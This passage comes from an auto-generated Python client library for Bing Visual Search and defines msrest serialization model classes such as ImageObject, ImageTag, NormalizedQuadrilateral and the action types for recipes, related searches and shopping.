'content_size': {'readonly': True},
'encoding_format': {'readonly': True},
'host_page_display_url': {'readonly': True},
'width': {'readonly': True},
'height': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'content_url': {'key': 'contentUrl', 'type': 'str'},
'host_page_url': {'key': 'hostPageUrl', 'type': 'str'},
'content_size': {'key': 'contentSize', 'type': 'str'},
'encoding_format': {'key': 'encodingFormat', 'type': 'str'},
'host_page_display_url': {'key': 'hostPageDisplayUrl', 'type': 'str'},
'width': {'key': 'width', 'type': 'int'},
'height': {'key': 'height', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(MediaObject, self).__init__(**kwargs)
self.content_url = None
self.host_page_url = None
self.content_size = None
self.encoding_format = None
self.host_page_display_url = None
self.width = None
self.height = None
class ImageObject(MediaObject):
"""Defines an image.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar content_url: Original URL to retrieve the source (file) for the media object (e.g., the
source URL for the image).
:vartype content_url: str
:ivar host_page_url: URL of the page that hosts the media object.
:vartype host_page_url: str
:ivar content_size: Size of the media object content. Use format "value unit" (e.g., "1024 B").
:vartype content_size: str
:ivar encoding_format: Encoding format (e.g., png, gif, jpeg, etc).
:vartype encoding_format: str
:ivar host_page_display_url: Display URL of the page that hosts the media object.
:vartype host_page_display_url: str
:ivar width: The width of the media object, in pixels.
:vartype width: int
:ivar height: The height of the media object, in pixels.
:vartype height: int
:ivar thumbnail: The URL to a thumbnail of the image.
:vartype thumbnail: ~visual_search_client.models.ImageObject
:ivar image_insights_token: The token that you use in a subsequent call to Visual Search API to
get additional information about the image. For information about using this token, see the
imageInsightsToken field inside the knowledgeRequest request parameter.
:vartype image_insights_token: str
:ivar insights_metadata: A count of the number of websites where you can shop or perform other
actions related to the image. For example, if the image is of an apple pie, this object
includes a count of the number of websites where you can buy an apple pie. To indicate the
number of offers in your UX, include badging such as a shopping cart icon that contains the
count. When the user clicks on the icon, use imageInsightsToken in a subsequent Visual Search
API call to get the list of shopping websites.
:vartype insights_metadata: ~visual_search_client.models.ImagesImageMetadata
:ivar image_id: Unique Id for the image.
:vartype image_id: str
:ivar accent_color: A three-byte hexadecimal number that represents the color that dominates
the image. Use the color as the temporary background in your client until the image is loaded.
:vartype accent_color: str
:ivar visual_words: For internal use only.
:vartype visual_words: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'content_url': {'readonly': True},
'host_page_url': {'readonly': True},
'content_size': {'readonly': True},
'encoding_format': {'readonly': True},
'host_page_display_url': {'readonly': True},
'width': {'readonly': True},
'height': {'readonly': True},
'thumbnail': {'readonly': True},
'image_insights_token': {'readonly': True},
'insights_metadata': {'readonly': True},
'image_id': {'readonly': True},
'accent_color': {'readonly': True},
'visual_words': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'content_url': {'key': 'contentUrl', 'type': 'str'},
'host_page_url': {'key': 'hostPageUrl', 'type': 'str'},
'content_size': {'key': 'contentSize', 'type': 'str'},
'encoding_format': {'key': 'encodingFormat', 'type': 'str'},
'host_page_display_url': {'key': 'hostPageDisplayUrl', 'type': 'str'},
'width': {'key': 'width', 'type': 'int'},
'height': {'key': 'height', 'type': 'int'},
'thumbnail': {'key': 'thumbnail', 'type': 'ImageObject'},
'image_insights_token': {'key': 'imageInsightsToken', 'type': 'str'},
'insights_metadata': {'key': 'insightsMetadata', 'type': 'ImagesImageMetadata'},
'image_id': {'key': 'imageId', 'type': 'str'},
'accent_color': {'key': 'accentColor', 'type': 'str'},
'visual_words': {'key': 'visualWords', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ImageObject, self).__init__(**kwargs)
self.thumbnail = None
self.image_insights_token = None
self.insights_metadata = None
self.image_id = None
self.accent_color = None
self.visual_words = None
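# Illustrative sketch (not part of the generated client): the
# server-populated image_insights_token on an ImageObject can seed a
# follow-up Visual Search request via ImageInfo. No HTTP call is made here;
# wiring this into a request belongs to the operations layer.
def _example_follow_up_info(image):
    if image.image_insights_token is None:
        return None
    return ImageInfo(image_insights_token=image.image_insights_token)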
class ImageRecipesAction(ImageAction):
"""Defines an recipe action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
:ivar data: A list of recipes related to the image.
:vartype data: ~visual_search_client.models.RecipesModule
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
'data': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
'data': {'key': 'data', 'type': 'RecipesModule'},
}
def __init__(
self,
**kwargs
):
super(ImageRecipesAction, self).__init__(**kwargs)
self.data = None
class ImageRelatedSearchesAction(ImageAction):
"""Defines an related search action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
:ivar data: A list of queries related to the image.
:vartype data: ~visual_search_client.models.RelatedSearchesModule
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
'data': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
'data': {'key': 'data', 'type': 'RelatedSearchesModule'},
}
def __init__(
self,
**kwargs
):
super(ImageRelatedSearchesAction, self).__init__(**kwargs)
self.data = None
class ImageShoppingSourcesAction(ImageAction):
"""Defines a shopping sources action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
:ivar data: A list of merchants that offer items related to the image.
:vartype data: ~visual_search_client.models.AggregateOffer
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
'data': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
'data': {'key': 'data', 'type': 'AggregateOffer'},
}
def __init__(
self,
**kwargs
):
super(ImageShoppingSourcesAction, self).__init__(**kwargs)
self.data = None
class ImagesImageMetadata(msrest.serialization.Model):
"""Defines a count of the number of websites where you can shop or perform other actions related to the image.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar shopping_sources_count: The number of websites that sell the products seen in the image.
:vartype shopping_sources_count: int
:ivar recipe_sources_count: The number of websites that offer recipes of the food seen in the
image.
:vartype recipe_sources_count: int
:ivar aggregate_offer: A summary of the online offers of products found in the image. For
example, if the image is of a dress, the offer might identify the lowest price and the number
of offers found. Only visually similar products insights include this field. The offer includes
the following fields: Name, AggregateRating, OfferCount, and LowPrice.
:vartype aggregate_offer: ~visual_search_client.models.AggregateOffer
"""
_validation = {
'shopping_sources_count': {'readonly': True},
'recipe_sources_count': {'readonly': True},
'aggregate_offer': {'readonly': True},
}
_attribute_map = {
'shopping_sources_count': {'key': 'shoppingSourcesCount', 'type': 'int'},
'recipe_sources_count': {'key': 'recipeSourcesCount', 'type': 'int'},
'aggregate_offer': {'key': 'aggregateOffer', 'type': 'AggregateOffer'},
}
def __init__(
self,
**kwargs
):
super(ImagesImageMetadata, self).__init__(**kwargs)
self.shopping_sources_count = None
self.recipe_sources_count = None
self.aggregate_offer = None
class ImagesModule(msrest.serialization.Model):
"""Defines a list of images.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: A list of images.
:vartype value: list[~visual_search_client.models.ImageObject]
"""
_validation = {
'value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[ImageObject]'},
}
def __init__(
self,
**kwargs
):
super(ImagesModule, self).__init__(**kwargs)
self.value = None
class ImageTag(Thing):
"""A visual search tag.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar display_name: Display name for this tag. For the default tag, the display name is empty.
:vartype display_name: str
:ivar bounding_box: The bounding box for this tag. For the default tag, there is no bounding
box.
:vartype bounding_box: ~visual_search_client.models.ImageTagRegion
:ivar actions: Actions within this tag. The order of the items denotes the default ranking
order of these actions, with the first action being the most likely user intent.
:vartype actions: list[~visual_search_client.models.ImageAction]
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'display_name': {'readonly': True},
'bounding_box': {'readonly': True},
'actions': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'bounding_box': {'key': 'boundingBox', 'type': 'ImageTagRegion'},
'actions': {'key': 'actions', 'type': '[ImageAction]'},
}
def __init__(
self,
**kwargs
):
super(ImageTag, self).__init__(**kwargs)
self.display_name = None
self.bounding_box = None
self.actions = None
class ImageTagRegion(msrest.serialization.Model):
"""Defines an image region relevant to the ImageTag.
All required parameters must be populated in order to send to Azure.
:param query_rectangle: Required. A rectangle that outlines the area of interest for this tag.
:type query_rectangle: ~visual_search_client.models.NormalizedQuadrilateral
:param display_rectangle: Required. A recommended rectangle to show to the user.
:type display_rectangle: ~visual_search_client.models.NormalizedQuadrilateral
"""
_validation = {
'query_rectangle': {'required': True},
'display_rectangle': {'required': True},
}
_attribute_map = {
'query_rectangle': {'key': 'queryRectangle', 'type': 'NormalizedQuadrilateral'},
'display_rectangle': {'key': 'displayRectangle', 'type': 'NormalizedQuadrilateral'},
}
def __init__(
self,
**kwargs
):
super(ImageTagRegion, self).__init__(**kwargs)
self.query_rectangle = kwargs['query_rectangle']
self.display_rectangle = kwargs['display_rectangle']
class Intangible(Thing):
"""A utility class that serves as the umbrella for a number of 'intangible' things such as quantities, structured values, etc.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Intangible, self).__init__(**kwargs)
class KnowledgeRequest(msrest.serialization.Model):
"""A JSON object containing information about the request, such as filters for the resulting actions.
:param filters: A key-value object consisting of filters that may be specified to limit the
results returned by the API.
:type filters: ~visual_search_client.models.Filters
"""
_attribute_map = {
'filters': {'key': 'filters', 'type': 'Filters'},
}
def __init__(
self,
**kwargs
):
super(KnowledgeRequest, self).__init__(**kwargs)
self.filters = kwargs.get('filters', None)
class NormalizedQuadrilateral(Intangible):
"""Defines a region of an image. The region is a convex quadrilateral defined by coordinates of its top left, top right, bottom left, and bottom right points. The coordinates are fractional values of the original image's width and height in the range 0.0 through 1.0.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:param top_left: Required. The top left corner coordinate.
:type top_left: ~visual_search_client.models.Point2D
:param top_right: Required. The top right corner coordinate.
:type top_right: ~visual_search_client.models.Point2D
:param bottom_right: Required. The bottom right corner coordinate.
:type bottom_right: ~visual_search_client.models.Point2D
:param bottom_left: Required. The bottom left corner coordinate.
:type bottom_left: ~visual_search_client.models.Point2D
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'top_left': {'required': True},
'top_right': {'required': True},
'bottom_right': {'required': True},
'bottom_left': {'required': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'top_left': {'key': 'topLeft', 'type': 'Point2D'},
'top_right': {'key': 'topRight', 'type': 'Point2D'},
'bottom_right': {'key': 'bottomRight', 'type': 'Point2D'},
'bottom_left': {'key': 'bottomLeft', 'type': 'Point2D'},
}
def __init__(
self,
**kwargs
):
super(NormalizedQuadrilateral, self).__init__(**kwargs)
self.top_left = kwargs['top_left']
self.top_right = kwargs['top_right']
self.bottom_right = kwargs['bottom_right']
self.bottom_left = kwargs['bottom_left']
class Organization(Thing):
"""Defines an organization.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Organization, self).__init__(**kwargs)
class PathsPsg33EImagesVisualsearchPostRequestbodyContentMultipartFormDataSchema(msrest.serialization.Model):
"""PathsPsg33EImagesVisualsearchPostRequestbodyContentMultipartFormDataSchema.
:param visual_search: The form data is a JSON object that identifies the image using an
insights token or URL to the image. The object may also include an optional crop area that
identifies an area of interest in the image. The insights token and URL are mutually exclusive
– do not specify both. You may specify knowledgeRequest form data and image form data in the
same request only if knowledgeRequest form data specifies the cropArea field only (it must not
include an insights token or URL).
:type visual_search: str
:param image: The form data is an image binary. The Content-Disposition header's name parameter
must be set to "image". You must specify an image binary if you do not use knowledgeRequest
form data to specify the image; you may not use both forms to specify an image. You may specify
knowledgeRequest form data and image form data in the same request only if knowledgeRequest
form data specifies the cropArea field only (it must not include an insights token or URL).
:type image: IO
"""
_attribute_map = {
'visual_search': {'key': 'knowledgeRequest', 'type': 'str'},
'image': {'key': 'image', 'type': 'IO'},
}
def __init__(
self,
**kwargs
):
super(PathsPsg33EImagesVisualsearchPostRequestbodyContentMultipartFormDataSchema, self).__init__(**kwargs)
self.visual_search = kwargs.get('visual_search', None)
self.image = kwargs.get('image', None)
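# Sketch (editor's addition): how the two multipart parts line up with this
# model. The 'knowledgeRequest' part carries the serialized VisualSearchRequest
# JSON and the 'image' part carries raw image bytes; per the docstring above,
# send one or the other unless knowledgeRequest holds only a cropArea. The file
# name and crop values are illustrative.
#
#     form = PathsPsg33EImagesVisualsearchPostRequestbodyContentMultipartFormDataSchema(
#         visual_search='{"imageInfo": {"cropArea": {"top": 0.1, "left": 0.1, "bottom": 0.9, "right": 0.9}}}',
#         image=open('photo.jpg', 'rb'),
#     )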
class Person(Thing):
"""Defines a person.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar job_title: The person's job title.
:vartype job_title: str
:ivar twitter_profile: The URL of the person's twitter profile.
:vartype twitter_profile: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'job_title': {'readonly': True},
'twitter_profile': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
